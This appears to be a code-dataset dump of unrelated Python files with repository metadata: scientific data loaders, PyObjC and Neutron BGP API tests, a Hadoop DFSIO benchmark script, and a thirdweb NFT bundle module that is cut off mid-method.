To calculate the value the file is downloaded to a temporary file that
is deleted after the hash is calculated.
"""
log.info('Downloading file to calculate SHA256, size: %s bytes',
format(blob.size, ",d"))
file = tempfile.NamedTemporaryFile(mode='w+b', delete=False)
file_name = file.name
try:
blob.download_to_file(file)
finally:
file.close()
with open(file_name, 'rb') as file:
file_md5 = hashlib.md5()
file_sha256 = hashlib.sha256()
while chunk := file.read(8192):
file_md5.update(chunk)
file_sha256.update(chunk)
os.unlink(file_name)
# The MD5 hash stored in blob object metadata is base64 encoded
file_md5 = base64.b64encode(file_md5.digest()).decode()
if blob.md5_hash != file_md5:
raise Exception(f'Blob {blob.name} MD5 mismatch', blob.md5_hash, file_md5)
# Return SHA256 as 64 character hex string
return file_sha256.hexdigest()
if __name__ == '__main__':
configure_script_logging(log)
adapter = WriteCustomMetadata(sys.argv[1:])
sys.exit(adapter.main())
| 2.828125 | 3 |
CSIKit/tools/convert_json.py | FredeJ/CSIKit | 67 | 12789321 | <reponame>FredeJ/CSIKit
import json
from CSIKit.util.csitools import get_CSI
from CSIKit.reader import get_reader
def generate_json(path: str, metric: str="amplitude") -> str:
"""
This function converts a csi_trace into the json format. It works for single entry or the whole trace.
Parameters:
path (str): Path to CSI file location.
"""
def default(prop):
if "complex" in str(type(prop)):
return str(prop)
if "numpy" in str(type(prop)):
return prop.tolist()
if "__dict__" in dir(prop):
return prop.__dict__
else:
print("Prop has no __dict__ {}: \n {}".format(type(prop), prop))
reader = get_reader(path)
csi_data = reader.read_file(path)
csi_matrix, no_frames, no_subcarriers = get_CSI(csi_data, metric)
print("CSI Shape: {}".format(csi_matrix.shape))
print("Number of Frames: {}".format(no_frames))
print("Generating CSI {}...".format(metric))
json_str = json.dumps(csi_matrix, default=default, indent=True)
return json_str | 2.78125 | 3 |
co2usa_load_netCDF.py | uataq/co2usa_data_synthesis | 0 | 12789322 | # -*- coding: utf-8 -*-
"""
co2usa_load_netCDF: Load the CO2-USA Data Synthesis files from netCDF
USAGE:
The CO2-USA synthesis data is available to download from the ORNL DAAC:
https://doi.org/10.3334/ORNLDAAC/1743
To download the data, first sign into your account (or create one if you don't have one).
Next, click on "Download Data" to download the entire data set in a zip file.
Extract the netCDF files to a folder on your computer.
The CO2-USA synthesis data files should be all saved in a single directory:
/co2_usa_netCDF_files/[netCDF_files.nc]
For example, for the CO2 data file for a Boston site would be:
/co2_usa_netCDF_files/boston_co2_HF_29m_1_hour_R0_2020-09-28.nc
Set the following variables:
city: String of CO2-USA city. Example:
city = 'boston'
species: String with target species. Example:
species = 'co2'
read_folder: Path to the directory where you saved the data files. Example:
current_folder = os.getcwd()
read_folder = current_folder+'\\netCDF_formatted_files\\'
The data is in the 'co2usa' variable.
For more information, visit the CO2-USA GitHub repository:
https://github.com/loganemitchell/co2usa_data_synthesis
Written by <NAME> (<EMAIL>)
University of Utah
Last updated: 2021-06-09
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
import glob
import netCDF4 as nc
#%% Executed this manually to enable interactive figures:
#%matplotlib qt
#%%
current_folder = os.getcwd()
read_folder = current_folder+'\\gcloud.utah.edu\\data\\co2-usa\\synthesis_output_ornl_new\\netCDF_formatted_files\\'
co2usa = {}
city = 'boston'
species = 'co2'
co2usa[city] = {}
all_files = glob.glob(read_folder+city+'_'+species+'*.nc')
for fni in range(len(all_files)):
#print('Loading '+all_files[fni])
nc_dat = nc.Dataset(all_files[fni])
site = all_files[fni][len(read_folder):all_files[fni].find('_1_hour')]
co2usa[city][site] = {}
co2usa[city][site]['global_attributes'] = {} # Site global attributes
for name in nc_dat.ncattrs():
co2usa[city][site]['global_attributes'][name] = getattr(nc_dat, name)
#print("Global attr {} = {}".format(name, getattr(nc_dat, name)))
co2usa[city][site]['attributes'] = {} # Variable attributes
for name in nc_dat.variables.keys():
co2usa[city][site]['attributes'][name] = {}
for attrname in nc_dat.variables[name].ncattrs():
co2usa[city][site]['attributes'][name][attrname] = getattr(nc_dat.variables[name], attrname)
#print("{} -- {}".format(attrname, getattr(nc_dat.variables[name], attrname)))
for name in nc_dat.variables.keys(): # Variable data
co2usa[city][site][name] = nc_dat.variables[name][:].data
# Convert to datetime
co2usa[city][site]['time'] = pd.to_datetime(co2usa[city][site]['time']*1e9)
# Take care of NaNs
co2usa[city][site][species][co2usa[city][site][species]==co2usa[city][site]['attributes'][species]['_FillValue']] = np.nan
# Remove the temporary netCDF variable
del nc_dat
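# Hedged illustration of the resulting structure (the site key depends on the files
# actually downloaded; the name below matches the example in the module docstring):
#   co2usa['boston']['boston_co2_HF_29m']['time']  -> pandas DatetimeIndex
#   co2usa['boston']['boston_co2_HF_29m']['co2']   -> numpy array with NaN for missing values
#   co2usa['boston']['boston_co2_HF_29m']['attributes']['co2'] -> per-variable metadata dict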
#%% Plot the CO2 USA data
sites = co2usa[city].keys()
f1 = plt.figure(1); f1.clf(); ax = f1.add_subplot(1, 1, 1)
plt.title(city+' '+species,fontsize=20)
for site in sites:
if site.find('background') == -1:
plt.plot(co2usa[city][site]['time'],co2usa[city][site][species],label=site)
for site in sites:
if site.find('background') != -1:
plt.plot(co2usa[city][site]['time'],co2usa[city][site][species],'k-',label=site)
ax.set_ylabel(species,fontsize=15)
plt.legend(fontsize=14)
plt.grid(True, axis='both')
plt.show()
| 2.828125 | 3 |
PyObjCTest/test_nsbitmapimagerep.py | Khan/pyobjc-framework-Cocoa | 132 | 12789323 | <reponame>Khan/pyobjc-framework-Cocoa
from PyObjCTools.TestSupport import *
import objc
import array
import sys
from objc import YES, NO
from AppKit import *
try:
unicode
except NameError:
unicode = str
try:
long
except NameError:
long = int
class TestNSBitmapImageRep(TestCase):
def testInstantiation(self):
# widthxheight RGB 24bpp image
width = 256
height = 256
dataPlanes = (None, None, None, None, None)
dataPlanes = None
i1 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
self.assertTrue(i1)
i2 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(None, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
self.assertTrue(i2)
def testPixelFormat(self):
width = 16
height = 16
i1 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bitmapFormat_bytesPerRow_bitsPerPixel_(None, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, NSAlphaFirstBitmapFormat, 0, 0)
self.assertIsInstance(i1, NSBitmapImageRep)
singlePlane = objc.allocateBuffer(width*height*4)
for i in range(0, width*height):
si = i * 4
singlePlane[si] = 1
singlePlane[si+1] = 2
singlePlane[si+2] = 3
singlePlane[si+3] = 4
dataPlanes = (singlePlane, None, None, None, None)
# test non-planar, premade buffer
i2 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bitmapFormat_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, NSAlphaFirstBitmapFormat, 0, 0)
self.assertIsInstance(i2, NSBitmapImageRep)
bitmapData = i2.bitmapData()
self.assertEqual(len(bitmapData), width * height * 4)
def testImageData(self):
width = 256
height = 256
rPlane = array.array('B')
rPlane.fromlist( [y%256 for y in range(0,height) for x in range(0,width)] )
if sys.version_info[0] == 3:
buffer = memoryview
else:
from __builtin__ import buffer
rPlane = buffer(rPlane)
gPlane = array.array('B')
gPlane.fromlist( [y%256 for y in range(0,height) for x in range(width,0,-1)] )
gPlane = buffer(gPlane)
bPlane = array.array('B')
bPlane.fromlist( [x%256 for y in range(0,height) for x in range(0,width)] )
bPlane = buffer(bPlane)
dataPlanes = (rPlane, gPlane, bPlane, None, None)
# test planar, pre-made buffer
i1 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, YES, NSDeviceRGBColorSpace, 0, 0)
self.assertTrue(i1)
singlePlane = objc.allocateBuffer(width*height*3)
for i in range(0, width*height):
si = i * 3
if sys.version_info[0] == 2:
singlePlane[si] = rPlane[i]
singlePlane[si+1] = gPlane[i]
singlePlane[si+2] = bPlane[i]
else:
def as_byte(v):
if isinstance(v, int):
return v
else:
return ord(v)
singlePlane[si] = as_byte(rPlane[i])
singlePlane[si+1] = as_byte(gPlane[i])
singlePlane[si+2] = as_byte(bPlane[i])
dataPlanes = (singlePlane, None, None, None, None)
# test non-planar, premade buffer
i2 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
# test grey scale
greyPlane = array.array('B')
greyPlane.fromlist( [x%256 for x in range(0,height) for x in range(0,width)] )
greyPlanes = (greyPlane, None, None, None, None)
greyImage = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(greyPlanes, width, height, 8, 1, NO, YES, NSCalibratedWhiteColorSpace, width, 8)
# test planar, NSBIR allocated buffer
i3 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(None, width, height, 8, 3, NO, YES, NSDeviceRGBColorSpace, 0, 0)
r,g,b,a,o = i3.getBitmapDataPlanes_()
self.assertTrue(r)
self.assertTrue(g)
self.assertTrue(b)
self.assertTrue(not a)
self.assertTrue(not o)
self.assertEqual(len(r), len(rPlane))
self.assertEqual(len(g), len(gPlane))
self.assertEqual(len(b), len(bPlane))
r[0:len(r)] = rPlane[0:len(rPlane)]
g[0:len(g)] = gPlane[0:len(gPlane)]
b[0:len(b)] = bPlane[0:len(bPlane)]
bitmapData = i2.bitmapData()
self.assertEqual(len(bitmapData), len(singlePlane))
try:
memoryview
except NameError:
self.assertEqual(bitmapData, singlePlane)
else:
self.assertEqual(bitmapData.tobytes(),
singlePlane)
a = array.array('L', [255]*4)
self.assertArgIsOut(NSBitmapImageRep.getPixel_atX_y_, 0)
d = i2.getPixel_atX_y_(a, 1, 1)
self.assertIs(a, d)
class TestBadCreation(TestCase):
# Redirect stderr to /dev/null for the duration of this test,
# NSBitmapImageRep will write an error message to stderr.
def setUp(self):
import os
self.duppedStderr = os.dup(2)
fp = os.open('/dev/null', os.O_RDWR)
os.dup2(fp, 2)
os.close(fp)
def tearDown(self):
import os
os.dup2(self.duppedStderr, 2)
def test_AllocInit(self):
y = NSBitmapImageRep.alloc()
try:
self.assertRaises(ValueError, y.init)
finally:
width = 256
height = 256
dataPlanes = (None, None, None, None, None)
y = y.initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
def testConstants(self):
self.assertEqual(NSTIFFCompressionNone, 1)
self.assertEqual(NSTIFFCompressionCCITTFAX3, 3)
self.assertEqual(NSTIFFCompressionCCITTFAX4, 4)
self.assertEqual(NSTIFFCompressionLZW, 5)
self.assertEqual(NSTIFFCompressionJPEG, 6)
self.assertEqual(NSTIFFCompressionNEXT, 32766)
self.assertEqual(NSTIFFCompressionPackBits, 32773)
self.assertEqual(NSTIFFCompressionOldJPEG, 32865)
self.assertEqual(NSTIFFFileType, 0)
self.assertEqual(NSBMPFileType, 1)
self.assertEqual(NSGIFFileType, 2)
self.assertEqual(NSJPEGFileType, 3)
self.assertEqual(NSPNGFileType, 4)
self.assertEqual(NSJPEG2000FileType, 5)
self.assertEqual(NSImageRepLoadStatusUnknownType, -1)
self.assertEqual(NSImageRepLoadStatusReadingHeader, -2)
self.assertEqual(NSImageRepLoadStatusWillNeedAllData, -3)
self.assertEqual(NSImageRepLoadStatusInvalidData, -4)
self.assertEqual(NSImageRepLoadStatusUnexpectedEOF, -5)
self.assertEqual(NSImageRepLoadStatusCompleted, -6)
self.assertEqual(NSAlphaFirstBitmapFormat, 1 << 0)
self.assertEqual(NSAlphaNonpremultipliedBitmapFormat, 1 << 1)
self.assertEqual(NSFloatingPointSamplesBitmapFormat, 1 << 2)
self.assertIsInstance(NSImageCompressionMethod, unicode)
self.assertIsInstance(NSImageCompressionFactor, unicode)
self.assertIsInstance(NSImageDitherTransparency, unicode)
self.assertIsInstance(NSImageRGBColorTable, unicode)
self.assertIsInstance(NSImageInterlaced, unicode)
self.assertIsInstance(NSImageColorSyncProfileData, unicode)
self.assertIsInstance(NSImageFrameCount, unicode)
self.assertIsInstance(NSImageCurrentFrame, unicode)
self.assertIsInstance(NSImageCurrentFrameDuration, unicode)
self.assertIsInstance(NSImageLoopCount, unicode)
self.assertIsInstance(NSImageGamma, unicode)
self.assertIsInstance(NSImageProgressive, unicode)
self.assertIsInstance(NSImageEXIFData, unicode)
self.assertIsInstance(NSImageFallbackBackgroundColor, unicode)
def testTiffCompression(self):
lst, nr = NSBitmapImageRep.getTIFFCompressionTypes_count_(None, None)
self.assertIsInstance(lst, tuple)
self.assertIsInstance(nr, (int, long))
self.assertEqual(len(lst), nr)
self.assertNotEqual(len(lst), 0)
self.assertIsInstance(lst[0], (int, long))
def testMethods(self):
self.assertResultIsBOOL(NSBitmapImageRep.isPlanar)
self.assertResultIsBOOL(NSBitmapImageRep.canBeCompressedUsing_)
self.assertArgIsBOOL(NSBitmapImageRep.incrementalLoadFromData_complete_, 1)
self.assertArgIsOut(NSBitmapImageRep.getCompression_factor_, 0)
self.assertArgIsOut(NSBitmapImageRep.getCompression_factor_, 1)
if __name__ == '__main__':
main( )
| 2.109375 | 2 |
neutron/tests/api/test_bgp_speaker_extensions.py | wwriverrat/neutron | 1 | 12789324 | # Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import config
from tempest import test
from tempest_lib import exceptions as lib_exc
from neutron.tests.api import base
from tempest.common import tempest_fixtures as fixtures
CONF = config.CONF
class BgpSpeakerTestJSONBase(base.BaseAdminNetworkTest):
default_bgp_speaker_args = {'local_as': '1234',
'ip_version': 4,
'name': 'my-bgp-speaker',
'advertise_floating_ip_host_routes': True,
'advertise_tenant_networks': True}
default_bgp_peer_args = {'remote_as': '4321',
'name': 'my-bgp-peer',
'peer_ip': '192.168.1.1',
'auth_type': '<PASSWORD>', 'password': '<PASSWORD>'}
@classmethod
def resource_setup(cls):
super(BgpSpeakerTestJSONBase, cls).resource_setup()
if not test.is_extension_enabled('bgp_speaker', 'network'):
msg = "BGP Speaker extension is not enabled."
raise cls.skipException(msg)
cls.ext_net_id = CONF.network.public_network_id
def create_bgp_speaker(self, auto_delete=True, **args):
data = {'bgp_speaker': args}
bgp_speaker = self.admin_client.create_bgp_speaker(data)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
if auto_delete:
self.addCleanup(self.delete_bgp_speaker, bgp_speaker_id)
return bgp_speaker
def create_bgp_peer(self, **args):
bgp_peer = self.admin_client.create_bgp_peer({'bgp_peer': args})
bgp_peer_id = bgp_peer['bgp-peer']['id']
self.addCleanup(self.delete_bgp_peer, bgp_peer_id)
return bgp_peer
def update_bgp_speaker(self, id, **args):
data = {'bgp_speaker': args}
return self.admin_client.update_bgp_speaker(id, data)
def delete_bgp_speaker(self, id):
return self.admin_client.delete_bgp_speaker(id)
def get_bgp_speaker(self, id):
return self.admin_client.get_bgp_speaker(id)
def create_bgp_speaker_and_peer(self):
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_peer = self.create_bgp_peer(**self.default_bgp_peer_args)
return (bgp_speaker, bgp_peer)
def delete_bgp_peer(self, id):
return self.admin_client.delete_bgp_peer(id)
def add_bgp_peer(self, bgp_speaker_id, bgp_peer_id):
return self.admin_client.add_bgp_peer_with_id(bgp_speaker_id,
bgp_peer_id)
def remove_bgp_peer(self, bgp_speaker_id, bgp_peer_id):
return self.admin_client.remove_bgp_peer_with_id(bgp_speaker_id,
bgp_peer_id)
def delete_address_scope(self, id):
return self.admin_client.delete_address_scope(id)
class BgpSpeakerTestJSON(BgpSpeakerTestJSONBase):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
Create bgp-speaker
Delete bgp-speaker
Create bgp-peer
Update bgp-peer
Delete bgp-peer
"""
@test.idempotent_id('df259771-7104-4ffa-b77f-bd183600d7f9')
def test_delete_bgp_speaker(self):
bgp_speaker = self.create_bgp_speaker(auto_delete=False,
**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.delete_bgp_speaker(bgp_speaker_id)
self.assertRaises(lib_exc.NotFound,
self.get_bgp_speaker,
bgp_speaker_id)
@test.idempotent_id('81d9dc45-19f8-4c6e-88b8-401d965cd1b0')
def test_create_bgp_peer(self):
self.create_bgp_peer(**self.default_bgp_peer_args)
@test.idempotent_id('6ade0319-1ee2-493c-ac4b-5eb230ff3a77')
def test_add_bgp_peer(self):
bgp_speaker, bgp_peer = self.create_bgp_speaker_and_peer()
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
bgp_peer_id = bgp_peer['bgp-peer']['id']
self.add_bgp_peer(bgp_speaker_id, bgp_peer_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
bgp_peers_list = bgp_speaker['bgp-speaker']['peers']
self.assertEqual(1, len(bgp_peers_list))
self.assertTrue(bgp_peer_id in bgp_peers_list)
@test.idempotent_id('f9737708-1d79-440b-8350-779f97d882ee')
def test_remove_bgp_peer(self):
bgp_peer = self.create_bgp_peer(**self.default_bgp_peer_args)
bgp_peer_id = bgp_peer['bgp-peer']['id']
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.add_bgp_peer(bgp_speaker_id, bgp_peer_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
bgp_peers_list = bgp_speaker['bgp-speaker']['peers']
self.assertTrue(bgp_peer_id in bgp_peers_list)
bgp_speaker = self.remove_bgp_peer(bgp_speaker_id, bgp_peer_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
bgp_peers_list = bgp_speaker['bgp-speaker']['peers']
self.assertTrue(not bgp_peers_list)
@test.idempotent_id('23c8eb37-d10d-4f43-b2e7-6542cb6a4405')
def test_add_gateway_network(self):
self.useFixture(fixtures.LockFixture('gateway_network_binding'))
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.admin_client.add_bgp_gateway_network(bgp_speaker_id,
self.ext_net_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
network_list = bgp_speaker['bgp-speaker']['networks']
self.assertEqual(1, len(network_list))
self.assertTrue(self.ext_net_id in network_list)
@test.idempotent_id('6cfc7137-0d99-4a3d-826c-9d1a3a1767b0')
def test_remove_gateway_network(self):
self.useFixture(fixtures.LockFixture('gateway_network_binding'))
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.admin_client.add_bgp_gateway_network(bgp_speaker_id,
self.ext_net_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
networks = bgp_speaker['bgp-speaker']['networks']
self.assertTrue(self.ext_net_id in networks)
self.admin_client.remove_bgp_gateway_network(bgp_speaker_id,
self.ext_net_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
network_list = bgp_speaker['bgp-speaker']['networks']
self.assertTrue(not network_list)
| 1.554688 | 2 |
supports/integration-test/dfsio_create_file.py | ypang2017/Test | 2 | 12789325 |
import sys
import subprocess
from util import *
def create_file_DFSIO(num):
"""
Please use this script in namenode
Each time create 10K * 2 files (10K in io_data and 10K in io_control).
Then, move these data to TEST_DIR.
"""
dfsio_cmd = "hadoop jar /usr/lib/hadoop-mapreduce/hadoop-" + \
"mapreduce-client-jobclient-*-tests.jar TestDFSIO " + \
"-write -nrFiles 10000 -fileSize 0KB"
    for i in range(num):
        # The commands are single strings (and the jar path contains a glob),
        # so they must be run through the shell.
        subprocess.call(dfsio_cmd, shell=True)
        subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_control " +
                        TEST_DIR + str(i) + "_control", shell=True)
        subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_data " +
                        TEST_DIR + str(i) + "_data", shell=True)
if __name__ == '__main__':
num = 50
try:
num = int(sys.argv[1])
except ValueError:
print "Usage: python dfsio_create_file [num]"
except IndexError:
pass
create_file_DFSIO(num)
| 2.46875 | 2 |
thirdweb/modules/bundle.py | princetonwong/python-sdk | 1 | 12789326 | """
Interact with the Bundle module of the app. Previously `collection`.
"""
from typing import List
from thirdweb_web3 import Web3
from ..abi.erc20 import ERC20
from ..abi.nft import SignatureMint721 as NFT
from ..abi.nft_collection import NFTCollection as NFTBundle
from ..types.bundle import BundleMetadata, CreateBundleArg, MintBundleArg
from ..types.metadata import Metadata
from ..types.nft import NftMetadata
from .base import BaseModule
class BundleModule(BaseModule):
"""
Interact with the Bundle module of the app. Previously `collection`.
"""
address: str
"""
Address of the module
"""
__abi_module: NFTBundle
def __init__(self, address: str, client: Web3):
"""
:param address: The address of the module
:param client: Web3 client
Initializes the module
"""
super().__init__()
self.address = address
self.__abi_module = NFTBundle(client, address)
def get(self, token_id: int) -> BundleMetadata:
"""
:param token_id: The token id to get
:return: Metadata of the bundle
Get the metadata for a given token id
"""
uri = self.__abi_module.uri.call(token_id)
meta_str = self.get_storage().get(uri)
meta: NftMetadata = NftMetadata.from_json(meta_str)
meta.id = token_id
return BundleMetadata(
metadata=meta,
supply=self.__abi_module.total_supply.call(token_id),
creator=self.__abi_module.creator.call(token_id),
id=token_id
)
def get_all(self) -> List[BundleMetadata]:
'''
:return: A list of metadata
Returns all the bundles in the contract
'''
return [self.get(i) for i in range(self.__abi_module.next_token_id.call())]
def balance_of(self, address: str, token_id: int) -> int:
'''
:param address: The address to check
:param token_id: The token id to check
:return: The balance
Returns the balance for a given token at owned by a specific address
'''
return self.__abi_module.balance_of.call(address, token_id)
def balance(self, token_id: int) -> int:
'''
:param token_id: The token id to check
:return: The balance
Returns the balance for a given token id for the current signers address
'''
return self.__abi_module.balance_of.call(
self.get_signer_address(),
token_id
)
def is_approved(self, address: str, operator: str) -> bool:
"""
:param address: The address to check
:param operator: The operator to check
:return: True if approved, False otherwise
"""
return self.__abi_module.is_approved_for_all.call(address, operator)
def set_approval(self, operator: str, approved: bool = True):
"""
:param operator: The operator to set approval for
:param approved: True if you want to approve, False otherwise
"""
self.execute_tx(self.__abi_module.set_approval_for_all.build_transaction(
operator, approved, self.get_transact_opts()
))
def transfer(self, to_address: str, token_id: int, amount: int):
"""
:param to_address: The address to transfer to
:param token_id: The token id to transfer
:param amount: The amount to transfer
Transfers a token to a new owner
"""
self.execute_tx(self.__abi_module.safe_transfer_from.build_transaction(
self.get_signer_address(), to_address, token_id, amount, "", self.get_transact_opts()
))
def create(self, metadata: Metadata) -> BundleMetadata:
"""
:param metadata: The metadata to be stored
:return: Metadata of the bundle
Creates a bundle.
"""
return self.create_batch([metadata])[0]
def create_batch(self, metas: List[Metadata]) -> List[BundleMetadata]:
"""
:param metas: The metadata to be stored
:return: List of metadatas of the bundles
Creates a bundle of NFTs
"""
meta_with_supply = [CreateBundleArg(
metadata=m, supply=0) for m in metas]
return self.create_and_mint_batch(meta_with_supply)
def create_and_mint(self, meta_with_supply: CreateBundleArg) -> BundleMetadata:
"""
:param meta_with_supply: Metadata with supply
:return: A metadata with supply
Create a bundle and mint it to the current signer address
"""
return self.create_and_mint_batch([meta_with_supply])[0]
def create_and_mint_batch(self, meta_with_supply: List[CreateBundleArg]) -> List[BundleMetadata]:
"""
:param meta_with_supply: A list of metadata with supply
:return: A list of metadata with supply
Creates bundles and mints them to the current signer address
"""
if len(meta_with_supply) == 0:
raise Exception("No metadata supplied")
uris = [self.upload_metadata(meta.metadata)
for meta in meta_with_supply]
supplies = [a.supply for a in meta_with_supply]
receipt = self.execute_tx(self.__abi_module.create_native_tokens.build_transaction(
self.get_signer_address(), uris, supplies, "", self.get_transact_opts()
))
result = self.__abi_module.get_native_tokens_event(
tx_hash=receipt.transactionHash.hex())
token_ids = result[0]['args']['tokenIds']
return [self.get(i) for i in token_ids]
def create_with_token(self, token_contract: str, token_amount: int, metadata: dict = None):
"""
:param token_contract: The address of the token contract
:param token_amount: The amount of tokens to mint
:param metadata: The metadata to be stored
WIP: This method is not yet complete.
"""
if token_contract == "" or token_contract is None or not self.get_client().isAddress(token_contract):
raise Exception("token_contract not a valid address")
if token_amount <= 0:
raise Exception("token_amount must be greater than 0")
uri = self.upload_metadata(metadata)
erc20 = ERC20(self.get_client(), token_contract)
allowance = erc20.allowance.call(
self.get_signer_address(), self.address)
if allowance < token_amount:
tx = erc20.increase_allowance.build_transaction(self.address,
token_amount,
self.get_transact_opts())
self.execute_tx(tx)
self.execute_tx(self.__abi_module.wrap_erc20.build_transaction(
token_contract, token_amount, token_amount, uri, self.get_transact_opts()
))
def create_with_nft(self, token_contract: str, token_id: int, metadata):
"""
:param token_contract: The address of the token contract
:param token_id: The id of the token
:param metadata: The metadata to be stored
WIP: This method is not yet complete.
"""
asset = NFT(self.get_client(), token_contract)
approved = asset.is_approved_for_all.call(
self.get_signer_address(), self.address)
if not approved:
is_token_approved = asset.get_approved.call(
token_id).lower() == self.address.lower()
if not is_token_approved:
self.execute_tx(asset.set_approval_for_all.build_transaction(
self.address, True, self.get_transact_opts()))
uri = self.upload_metadata(metadata)
self.execute_tx(self.__abi_module.wrap_erc721.build_transaction(
token_contract, token_id, uri, self.get_transact_opts()
))
def create_with_erc721(self, token_contract: str, token_id: int, metadata):
"""
:param token_contract: The address of the token contract
:param token_id: The id of the token
:param metadata: The metadata to be stored
WIP: This method is not yet complete. Same as create_with_nft()
"""
return self.create_with_nft(token_contract, token_id, metadata)
def create_with_erc20(self, token_contract: str, token_amount: int, metadata):
"""
:param token_contract: The address of the token contract
:param token_amount: The amount of tokens to mint
:param metadata: The metadata to be stored
WIP: This method is not yet complete. Same as create_with_token()
"""
return self.create_with_token(token_contract, token_amount, metadata)
def mint(self, args: MintBundleArg):
"""
:param args: The arguments for the mint
Mints a bundle to the current signer address
"""
self.mint_to(self.get_signer_address(), args)
def mint_to(self, to_address: str, arg: MintBundleArg):
"""
:param to_address: The address to mint to
:param arg: The arguments for the mint
Mints a bundle to the given address
"""
self.execute_tx(self.__abi_module.mint.build_transaction(
to_address, arg.token_id, arg.amount, "", self.get_transact_opts()
))
def mint_batch(self, args: List[MintBundleArg]):
"""
:param args: The arguments for the mint
Mints a list of bundles to the current signer address
"""
self.mint_batch_to(self.get_signer_address(), args)
def mint_batch_to(self, to_address, args: List[MintBundleArg]):
"""
:param to_address: The address to mint to
:param args: The arguments for the mint
:return: A list of minted bundles
Mints a list of bundles to the given address
"""
ids = [a.token_id for a in args]
amounts = [a.amount for a in args]
tx = self.__abi_module.mint_batch.build_transaction(
to_address, ids, amounts, self.get_transact_opts())
self.execute_tx(tx)
def burn(self, args: MintBundleArg):
"""
:param args: The arguments for the burn
Burns a bundle from the current signer address
"""
self.burn_from(self.get_signer_address(), args)
def burn_batch(self, args: List[MintBundleArg]):
"""
:param args: List of the arguments to burn
Burns a list of bundles from the current signer address
"""
self.burn_batch_from(self.get_signer_address(), args)
def burn_from(self, account: str, args: MintBundleArg):
"""
:param account: The account to burn from
:param args: The arguments for the burn
Burns a bundle from the given account
"""
self.execute_tx(self.__abi_module.burn.build_transaction(
account, args.token_id, args.amount, self.get_transact_opts()
))
def burn_batch_from(self, account: str, args: List[MintBundleArg]):
"""
:param account: The account to burn from
:param args: The arguments for the burn
Burns a list of bundles from the given account
"""
self.execute_tx(self.__abi_module.burn_batch.build_transaction(
account, [i.id for i in args], [
i.amount for i in args], self.get_transact_opts()
))
def transfer_from(self, from_address: str, to_address: str, args: MintBundleArg):
"""
:param from_address: The account to transfer from
:param to_address: The address to transfer to
:param args: The arguments for the transfer
Transfers a bundle from the given account to the given address
"""
self.execute_tx(self.__abi_module.safe_transfer_from.build_transaction(
from_address, to_address, args.token_id, args.amount, "", self.get_transact_opts()
))
def transfer_batch_from(self, from_address: str, to_address: str, args):
"""
:param from_address: The account to transfer from
:param to_address: The address to transfer to
:param args: The arguments for the transfer
Transfers a list of bundles from the given account to the given address
"""
self.execute_tx(self.__abi_module.safe_batch_transfer_from.build_transaction(
